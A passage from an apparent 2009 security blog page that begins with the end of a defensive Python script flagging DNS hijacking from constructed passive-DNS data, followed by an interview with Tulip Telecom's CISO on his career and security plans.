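# through the DNS provider's account. Domain, ranges and feed are constructed.
import ipaddress

EXPECTED_NS = {"ns1.dns-provider.example", "ns2.dns-provider.example"}
OWNED_NETS = [ipaddress.ip_network("198.51.100.0/24")]

# Constructed passive-DNS observations: (seen_at, name, rrtype, value)
FEED = [
    ("2009-12-17T20:00Z", "www.twitter.example", "A", "198.51.100.10"),
    ("2009-12-17T20:00Z", "twitter.example", "NS", "ns1.dns-provider.example."),
    ("2009-12-17T22:05Z", "www.twitter.example", "A", "203.0.113.7"),
    ("2009-12-17T22:05Z", "twitter.example", "NS", "ns1.dns-provider.example."),
]

DELEGATION = "delegation changed: registrar or NS level"
PROVIDER = "record changed at provider: points outside owned ranges"


def classify_changes(feed, expected_ns=EXPECTED_NS, owned_nets=OWNED_NETS):
    """Return (seen_at, name, value, reason) for each observation that breaks policy."""
    alerts = []
    for seen_at, name, rrtype, value in feed:
        if rrtype == "NS":
            if value.lower().rstrip(".") not in expected_ns:
                alerts.append((seen_at, name, value, DELEGATION))
        elif rrtype in ("A", "AAAA"):
            ip = ipaddress.ip_address(value)
            if not any(ip in net for net in owned_nets):
                alerts.append((seen_at, name, value, PROVIDER))
    return alerts


if __name__ == "__main__":
    for alert in classify_changes(FEED):
        print(alert)
```

A provider-level alert with no delegation alert, as in the Twitter case, points the response at the account: rotate the provider credentials, review the account's login history, and enable whatever multi-factor or IP-restriction controls the provider offers, rather than at the registrar.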

Monday, December 21, 2009

A quick review to few top rated hacking posts


Wednesday, December 16, 2009

Interview of Pawan Kumar Singh : The CISO of Tulip Telecom

Pawan Kumar Singh, the Chief Information Security Officer (CISO) of Tulip Telecom has an illustrious infosec career to his credit. Prior to his stint with Tulip Telecom, Singh was instrumental in setting up information security function and IS audit function for Indian industry leaders like Bharti Airtel. He shares lessons from his infosec career.

Q:How would you define the CISO's role in enhancing an organization's overall information security levels?

Pawan Kumar Singh: IT is a small factor in the whole scheme of information security. The person in charge of information security should understand every business aspect [like human resources (HR), administration and legal operations]. We need to convert technical lingo into financial risks for the management's understanding. CISO's role is to guide the management when it comes to risk aligned with the line of business. So CISOs can be viewed as consultants. A CISO faces various organizational bottlenecks, since you basically police every individual's activities and find loopholes in business functions. Buy-in for security initiatives come only when top management is committed to security.

Can you give some tips for infosec professionals on how to groom themselves to become CISOs?

Pawan Kumar Singh: Security per se cannot be taught. It is a mindset which you develop over a period of time. A security professional should have a mindset which is always able to detect risk aligned with processes.

To build a career in infosec, you should thoroughly understand three aspects: security operations (IT network), processes and compliance. A thorough knowledge of technology is necessary, although you may not need to know every product. Also you should understand the difference between policy, processes, procedure and guidelines. These are often used interchangeably.

How far has your role as a CISO changed over the years?

Pawan Kumar Singh: Seven years back, I was quite hands-on with technology. After I moved to Bharti Airtel, I was responsible for establishment of the information security team and audit function. Internal audit is critical, as it helps the organization to understand third party performance. These audits face resistance, and third parties often hide information. We started seeing IT audit alignment after a few audit cycles.

When I joined Tulip as the CISO, there was a larger change in my role. It required me to get out of operational mindsets and adopt a strategic outlook. The only way to learn was through observation and interaction. I had the right people around me. You should interact with the C-level to understand business objectives and how they perceive risk. Infosec is a field where you need to learn constantly.

Can you tell us about the infosec landscape at Tulip and your priorities for 2010?

Pawan Kumar Singh: At Tulip, security measures are being implemented a bit slowly but strategically. In the past, there were bottlenecks due to change of management, but things are stable now. I am seeing a positive change in the management's mindset; they are realizing that security should be imbibed in the organizational DNA. It will take a while to change a 12 year old organization.

With each passing day, we are getting more process oriented. My first priority is to align three critical functions — administrative, HR and IT. If you can get this alignment, you can be assured that 70% of your infosec requirements are complete. Although I am not making any specific demands in the 2010 security budget, I will ask for budgets to increase automation in the administrative and HR functions. We want to bring more control in these functions. I also take care of ISO certification for Tulip, which includes ISO 27001, ISO 9000, ISO 20000.

In 2010, I plan to deploy an end point security solution for our laptop and desktop users. We will further strengthen our perimeter security and audit functions. There will also be an increase in employee training and awareness session investments to change user mindsets.

You can catch him on Linkedin @ http://in.linkedin.com/in/singhpk
